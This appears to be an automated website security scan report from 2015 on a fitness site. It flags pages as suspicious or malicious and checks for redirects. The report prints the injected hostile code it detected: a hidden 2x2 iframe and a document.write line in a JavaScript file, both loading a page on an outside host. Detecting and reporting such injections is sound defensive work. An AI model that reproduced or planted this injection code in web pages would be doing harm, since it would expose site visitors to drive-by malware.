Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elitecombatfitness.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://elitecombatfitness.com/ | 200 OK Content-Length: 32317 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://sannalegno.it/ewhd.html?i=614591 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?i=614591> | ||
http://www.elitecombatfitness.com/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://www.elitecombatfitness.com/fsp.js | 200 OK Content-Length: 3446 Content-Type: application/x-javascript | clean |
http://www.elitecombatfitness.com/scroller.js | 200 OK Content-Length: 3155 Content-Type: application/x-javascript | clean |
http://elitecombatfitness.com/AC_RunActiveContent.js | 200 OK Content-Length: 8185 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?j=614591></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sannalegno.it/ewhd.html?j=614591 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?j=614591> | ||
http://elitecombatfitness.com/index.htm | 200 OK Content-Length: 32317 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://sannalegno.it/ewhd.html?i=614591 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?i=614591> | ||
http://elitecombatfitness.com/about.html | 200 OK Content-Length: 11193 Content-Type: text/html | malicious |
Malicious iFrame found. size: 621x696 src: http://www.elitecombatfitness.com/concepts.htm This URL is marked by Google as suspicious <iframe name="stage" width="621" height="696" marginwidth="1" marginheight="1" scrolling="no" border="0" frameborder="0" src="http://www.elitecombatfitness.com/concepts.htm"> | ||
http://elitecombatfitness.com/gen_validatorv2.js | 200 OK Content-Length: 11125 Content-Type: application/x-javascript | clean |
http://elitecombatfitness.com/media.html | 200 OK Content-Length: 15759 Content-Type: text/html | clean |
http://www.elitecombatfitness.com/AC_RunActiveContent.js | 200 OK Content-Length: 8185 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?j=614591></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sannalegno.it/ewhd.html?j=614591 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?j=614591> | ||
http://s7.addthis.com/js/152/addthis_widget.js | 200 OK Content-Length: 11637 Content-Type: text/javascript | clean |
http://elitecombatfitness.com/test404page.js | 404 Not Found Content-Length: 1546 Content-Type: text/html | clean |
http://elitecombatfitness.com/gallery.html | 200 OK Content-Length: 8358 Content-Type: text/html | clean |
http://elitecombatfitness.com/certification.html | 200 OK Content-Length: 64190 Content-Type: text/html | clean |
http://www.commandokravmaga.com/html/locations/tabs_slides.js | 200 OK Content-Length: 10450 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elitecombatfitness.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 21:38:31 GMT
Accept-Ranges: bytes
ETag: "188530e-7e3d-4ef2647615b7b"
Server: Apache
Content-Length: 32317
Content-Type: text/html
Last-Modified: Sat, 04 Jan 2014 14:59:52 GMT
...32317 bytes of data.
GET / HTTP/1.1
Host: elitecombatfitness.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 21:38:31 GMT
Accept-Ranges: bytes
ETag: "188530e-7e3d-4ef2647615b7b"
Server: Apache
Content-Length: 32317
Content-Type: text/html
Last-Modified: Sat, 04 Jan 2014 14:59:52 GMT
...32317 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: elitecombatfitness.com
Referer: http://www.google.com/search?q=elitecombatfitness.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: elitecombatfitness.com
Referer: http://www.google.com/search?q=elitecombatfitness.com
Result:
The result is similar to the first query. There are no suspicious redirects found.